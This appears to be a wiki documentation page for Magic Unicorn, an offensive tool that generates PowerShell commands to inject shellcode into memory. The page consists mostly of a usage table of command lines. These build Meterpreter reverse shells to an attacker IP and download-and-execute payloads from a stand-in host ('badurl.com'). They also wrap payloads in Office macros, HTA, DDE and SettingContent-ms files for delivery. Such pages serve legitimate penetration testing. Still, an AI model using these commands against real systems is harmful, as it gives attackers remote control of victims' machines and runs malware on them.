Unicorn
Jump to navigation
Jump to search
Description
Magic Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber's powershell attacks and the powershell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.
Installation
$ git clone https://github.com/trustedsec/unicorn.git
Usage
Just run Magic Unicorn (ensure Metasploit is installed if using Metasploit methods and in the right path) and magic unicorn will automatically generate a powershell command that you need to simply cut and paste the powershell code into a command line window or through a payload delivery system. Unicorn supports your own shellcode, cobalt strike, and Metasploit.
Usage: python unicorn.py payload reverse_ipaddr port <optional hta or macro, crt>
| Example | Syntax |
|---|---|
| PS Example | python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443
|
| PS Down/Exec | python unicorn.py windows/download_exec url=http://badurl.com/payload.exe
|
| PS Down/Exec Macro | python unicorn.py windows/download_exec url=http://badurl.com/payload.exe macro
|
| Macro Example | python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 macro
|
| Macro Example CS | python unicorn.py <cobalt_strike_file.cs> cs macro
|
| HTA Example | python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 hta
|
| HTA SettingContent-ms Metasploit | python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 ms
|
| HTA Example CS | python unicorn.py <cobalt_strike_file.cs> cs hta
|
| HTA Example SettingContent-ms | python unicorn.py <cobalt_strike_file.cs> cs ms
|
| HTA Example SettingContent-ms | python unicorn.py <path_to_shellcode.txt>: shellcode ms
|
| DDE Example | python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 dde
|
| CRT Example | python unicorn.py <path_to_payload/exe_encode> crt
|
| Custom PS1 Example | python unicorn.py <path to ps1 file>
|
| Custom PS1 Example | python unicorn.py <path to ps1 file> macro 500
|
| Cobalt Strike Example | python unicorn.py <cobalt_strike_file.cs> cs (export CS in C# format)
|
| Custom Shellcode | python unicorn.py <path_to_shellcode.txt> shellcode (formatted 0x00 or metasploit)
|
| Custom Shellcode HTA | python unicorn.py <path_to_shellcode.txt> shellcode hta (formatted 0x00 or metasploit)
|
| Custom Shellcode Macro | python unicorn.py <path_to_shellcode.txt> shellcode macro (formatted 0x00 or metasploit)
|
| Generate .SettingContent-ms | python unicorn.py ms
|